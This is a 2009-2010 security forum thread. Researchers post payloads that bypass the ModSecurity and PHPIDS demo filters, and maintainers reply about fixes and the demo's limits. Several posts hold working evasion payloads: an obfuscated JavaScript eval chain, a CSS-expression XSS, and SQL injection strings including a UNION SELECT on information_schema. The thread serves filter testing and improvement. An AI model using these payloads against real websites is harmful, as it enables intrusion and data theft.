Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Modsecurity + phpids
Posted by: Gareth Heyes
Date: November 12, 2009 09:07AM

Let the fun begin! :)

http://bit.ly/2hHTsX


OOOOPPPSSS lol
http://tinyurl.com/yzbxz5v

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/12/2009 09:23AM by Gareth Heyes.

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: rvdh
Date: November 12, 2009 10:11AM

lol, nice 1

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: thornmaker
Date: November 12, 2009 01:50PM

i developed this while listening to Ryan's owasp talk on mod security and the new demo page: http://pastebin.ca/1668658

it doesn't work if you pass it in as a GET param (new line chars trigger the mod security response splitting filter) so cut/paste it into the text box.

interesting notes: i got it working in php-ids first. when i tried it on the mod security demo page, i was triggering one filter that php-ids wasn't. a simple tweak to the injection and it bypassed both.

injection is:

__=''
$$$$=__+'t(0),1'
$$$=__
$$=__+'e'
__=__+'__par'
_=$$+'val'
x1=1+$$$+[]
z=$$+'nt__'
x1=x1[__+z]
x1=x1[_]
y=x1('aler'+$$$$)
x1(y)
'abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_abc-def=abc-def_'

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: brianrectanus
Date: November 13, 2009 01:02PM

Working on a fix for these type attacks. Addmittedly a bit lame at the moment, but stopping this attach and similar ones.

-B

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: rcbarnett
Date: November 13, 2009 02:41PM

Yeah, this is re-enforcing what we already knew after discussing the translation of the default_filters.xml data into ModSecurity's rules language with Mario. While we have converted some of the normalization functions from the Converter.php code into ModSecurity SecRules, there are still some that we are missing (namely the conversion of various quotes into just double-qoutes) and thus some of the signatures aren't matching in the CRS demo when they are in the phpids smoketest page. The other missing component is the Centrifuge detection which is the other category of items that our demo has missed and phpids has caught thus far.

What I believe needs to be done is to get the Converter.php code ported over to a Lua script that can be used in ModSecurity.

Anyone want to tackle this project??? :)

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: Gareth Heyes
Date: November 17, 2009 08:52AM

This bypasses the modsecurity rules:-

<div/style=`-:expressio&#x5c&#x36&#x65(\u006&#x34;omai&#x6e=x)` x=modsecurity.org>

changes document.domain to modsecurity.org

I'd bypass the PHPIDS rule as well but seen as the demo doesn't display it or tell me which one it is I couldn't be bothered

Explanation:-
-I used css escapes for the "n" along with malformed hex html entities
-For the domain assignment I use unicode js escapes with hex entity encoding
-x is obtained from the html attribute and automatically is in scope of the expression
-`` are used to bypass style injection rules

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 11/17/2009 08:57AM by Gareth Heyes.

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: lightos
Date: November 19, 2009 03:23PM

mysql''x'and'1'like'1
mysql''x'and'1'like'0

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: lightos
Date: November 21, 2009 07:13AM

It is possible to bypass a lot of rules using NBSP (NO-BREAK SPACE U+00A0), for example:

http://www.modsecurity.org/demo/phpids?test=%27%a0and%201%20%a0=%a0%272



Edited 1 time(s). Last edit at 11/21/2009 07:15AM by lightos.

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: lightos
Date: November 23, 2009 09:18PM

'|' 1
' and 1.^.1/' 1
' and 1.^' 2

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: Gareth Heyes
Date: November 24, 2009 06:22AM

Modsecurity + phpids

VBScript.Encode:&#x23&#x40&#x7e&#x5e;CAAAAA&#x3d&#x3d&#x5cko&#x24K6,FoQIAAA&#x3d&#x3d&#x5e&#x23&#x7e&#x40

:D

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: lightos
Date: November 25, 2009 03:33AM

sql'xor' 1
sql'having~! '

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: lightos
Date: November 25, 2009 11:39PM

'group by'1'having'1

null''null'|locate(uname, 'lightos') and '1

'''and~1/null||null-1 or uname sounds like 'lightos

2a'-1.and'0'|find_in_set(uname, 'lightos' ) and '1

'-1-0 union select-1,(select `table_name` from `information_schema`.tables limit 1) and '1 (phpids only)



Edited 2 time(s). Last edit at 11/26/2009 06:22AM by lightos.

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: Reiners
Date: November 26, 2009 09:12AM

nice ones =)

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: Gareth Heyes
Date: April 22, 2010 08:22AM

I declare this thread pointless and no fun. Modsecurity is snake oil

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Modsecurity + phpids
Posted by: brianrectanus
Date: April 22, 2010 02:38PM

Yeah, the format of the demo is not ideal. It needs some work. The demo does not really test ModSecurity very well, but rather tests the core rule set. The better the rule set, the better the demo would be. We cannot tailor the rule set for the demo that does not actually protect anything.

Snake oil though? I think that is pushing it a bit. I guess, though, you can call any WAF/IDS/IPS with just an on/off switch snake oil and that is pretty much what demos are. So I'll give you that - demos like this are snake oil, but that does not mean the product being demoed is. Turning what we have in the demo on in a real site would be full of false positives as the demo is designed to be as generic as possible. However, in the real world you would have real apps installed behind ModSecurity and more targeted rules. You would not care so much for some of the crazy encodings against technology that is not in use anyhow.

Additionally, ModSecurity is not all about blocking, but also about auditing and visibility into your app. People are way too into blocking right now and a WAF/IPS that does block will need to be tuned to avoid FP to avoid loss of revenue, etc. Nothing is going to be 100% fool proof and that keeps you employed, so be happy there ;)

We put the demo up because people asked for it. It is not perfect, but it does help tune the core rule set. In hindsight maybe the demo was a bad idea as it does not help that much. Something more fun would be a challenge against a real website. I would not hold my breath for something like that, though, as vendors get berated for not putting up demos, then when they do they get berated for that, too, so why should a vendor bother with it? It is just added maintenance and time.

-B

Options: ReplyQuote


Sorry, only registered users may post in this forum.